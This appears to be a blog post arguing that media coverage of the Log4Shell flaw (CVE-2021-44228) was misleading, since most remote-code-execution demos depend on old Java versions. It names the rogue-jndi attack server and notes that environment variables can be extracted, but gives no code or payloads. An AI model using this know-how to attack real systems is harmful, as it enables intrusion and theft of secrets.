I won't detail the vulnerability here, if you don't know it, first check my repo KosmX/CVE-2021-44228-example.
Or use an external reference. Be aware, most of the online details about this, are misleading!
On december 9th 2021 the vulnerability was discovered.
For short, you can execute JNDI lookups by logging a special code.
And, there are GH repos saying the same.
Most misleading news refer to https://twitter.com/_JohnHammond as proof or main source. He did share multiple images, successfully utilizing the exploit on Minecraft.
No matter, how hard I tried to reproduce the result, run other examples, it just didn't work. (Latest version of MS JDK 17)
But what did I do wrong?
At the time, I did not know, what JNDI is for, I just tried to copy code.
Eventually, I understood JNDI enough, to realize the missing part.
JNDI lookup is to load remote objects with known types.
It does this through an ObjectFactory.
(interface, receives data, output a copy of the remote object)
JNDI does NOT load remote code, and it will never do that.
Oh, wait.
Another vulnerability? in JDAP?
Some PoCs include the malicius class in the classpath, others used another vulnerability paired with this one.
The most commonly used vulnerability:
Java™ SE Development Kit 8, Update 191 Release Notes (oracle.com)
At the bottom:
JDK-8196902 (not public)
This release also contains fixes for security vulnerabilities described in the Oracle Critical Patch Update. For a more complete list of the bug fixes included in this release, see the JDK 8u191 Bug Fixes page.
So what?
veracode-research/rogue-jndi: A malicious LDAP server for JNDI injection attacks (github.com) This is referred as
- RemoteReference.java - classic JNDI attack, leads to RCE via remote classloading, works up to jdk8u191
So, with a malicious payload, we can load a remote class in Java...
And with CVE-2021-44228 we can request a class loading in the target machine.
Using this is just not realistic.
Or even if they did, no-one found them.
Most likely, because John Hammond did not mention it in his tweets.
Journalists don't check if the science is correct, they just write about it. As fast as possible.
And this can lead to some confusion.
This is not the only way, Log4j can be exploited, but the most commonly used in POCs
There are other JNDI vulnerabilities. rogue-jndi is listing 5 of them.
Don't worry, Log4j2 exploit is still a very powerful vulnerability, With paired with another JNDI vulnerability, it can lead to RCE.
It can also be used to extract environment variables, and for that, no other vulnerability is needed.
more about here: KosmX/CVE-2021-44228-example
Later John Hammond released a video, where he show the exploit, and indeed, he uses old Java. BUT not a word about it.
https://www.youtube.com/watch?v=7qoPDq41xhQ